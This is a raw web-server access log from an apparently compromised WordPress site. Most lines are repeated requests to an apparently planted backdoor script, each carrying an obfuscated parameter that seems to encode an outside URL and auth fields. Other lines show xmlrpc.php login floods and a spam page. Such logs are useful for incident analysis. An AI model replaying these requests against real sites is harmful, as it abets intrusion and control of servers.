159.203.45.159 - - [16/Oct/2025:10:57:17 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
142.4.205.1 - - [16/Oct/2025:10:56:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303138342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363538342q3463356638373132363166363533626362643465656332666638323363386664222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
159.203.45.159 - - [16/Oct/2025:10:57:27 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
159.203.45.159 - - [16/Oct/2025:10:57:40 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
142.4.205.1 - - [16/Oct/2025:10:56:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303230342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363630342q6639303261383138386265626262383665616337393239343361396430353039222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
159.203.45.159 - - [16/Oct/2025:10:57:48 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
216.73.216.189 - - [16/Oct/2025:10:58:00 -0400] "GET / HTTP/1.0" 200 9227 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
50.6.7.129 - - [16/Oct/2025:10:58:03 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko"
69.197.179.242 - - [16/Oct/2025:10:57:03 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:10:57:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303232342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363632342q6262363537316664653465393163616438653432316232663431373335383861222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
50.6.7.129 - - [16/Oct/2025:10:58:11 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko"
50.6.7.129 - - [16/Oct/2025:10:58:18 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9239 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:10:57:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303234342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363634342q6261616537653137373036363232316536323965633932313935633434366164222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:10:57:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303236342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363636342q3738613537316666363138343564366132363562656535336130646362313337222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.10 - - [16/Oct/2025:10:58:48 -0400] "GET /market/2274549857.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
142.4.205.1 - - [16/Oct/2025:10:58:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303238342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363638342q3030323139323664663735353733373731656630626266636364316439363734222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:10:59:05 -0400] "GET /?_g=2190831 HTTP/1.0" 200 25172 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:10:58:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303330342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363730342q6633366133343435393135373530386263653566373663653532333330333135222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:10:58:42 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:10:58:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303332342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363732342q3366626639306238313430663730653535323932353862373165363437313034222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:10:59:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303334342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363734342q6331303230393063393663613230653430666438393136626464373439343466222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:10:59:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303336342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363736342q3239323234353839643564326139643030363630643639626463353164363761222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:10:59:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303338342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363738342q3039353233363663323435633131353338393162646230333765623134336636222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:00:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303430342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363830342q3932613833386462656433666632396463353763363033653335656465373834222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:00:13 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:00:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303432342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363832342q6334373531393334366362383038393232633937366466363830633537393637222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:00:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303434342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363834342q3865303963636133313562653830643861343036616133666639636537663133222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:01:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303436342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363836342q3233613766316161656565613261363166393765333161393531333161306632222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.12 - - [16/Oct/2025:11:02:11 -0400] "GET /market/2274705131.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
142.4.205.1 - - [16/Oct/2025:11:01:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303438342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363838342q3735343831383865376634616263313863663139353131656135326334643331222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:01:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303530342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363930342q6161653036616663396631616661613032633333323433656438346537373439222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:01:45 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:02:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303532342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363932342q3438396332373936663061383538383239613162326637316563376633633164222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:02:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303534342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363934342q6530373436343665346135393930663764393432613332313430306630626132222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:02:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303536342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363936342q6636326533623361323963383038393131326131653338616638646363663964222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:03:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303538342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632363938342q6432326163383533373130376163633436363639373662643537326363666338222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:03:14 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:03:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303630342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373030342q6665613461653938656331333435333538653632323265383666323464393832222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:03:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303632342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373032342q3863376239306435393863366238343437333036366265636436343235663263222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:04:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303634342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373034342q3862636532376132353231346139633763303234326534333639333564633066222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:04:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303636342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373036342q3366316566346161303833633137396330633963646537333330353836313661222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:04:42 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:04:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303638342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373038342q3866336666373437333961333331663831666238343232613834646137343337222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:05:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303730342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373130342q6239653261373461383730333536376563333666363564376435646161373237222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:05:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303732342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373132342q6433356231643262353761663063303865363063373438643563323366313532222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.138.172 - - [16/Oct/2025:11:06:32 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2022/05 HTTP/1.0" 200 6776 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2022" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:11:05:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303734342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373134342q6263636664393734396665323865333062633331356365343637666632383638222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:06:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303736342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373136342q6165356463653135306564336438643763313230636166373134656532333762222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:06:12 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:06:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303738342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373138342q3731393535623939313832393338306262633964393032323835346134386239222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
74.117.196.219 - - [16/Oct/2025:11:07:43 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/7.0)"
142.4.205.1 - - [16/Oct/2025:11:06:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303830342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373230342q3666313665653230623136353865383262353737623063643233653431316234222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:07:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303832342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373232342q3036393634363262313363303332386135613861643361343434626137393936222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:07:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303834342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373234342q3934646133383262346462393436333530323365386638623264653438653865222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:07:40 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:07:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303836342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373236342q6635346437666163613531356233626163623135346639623763663930653632222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
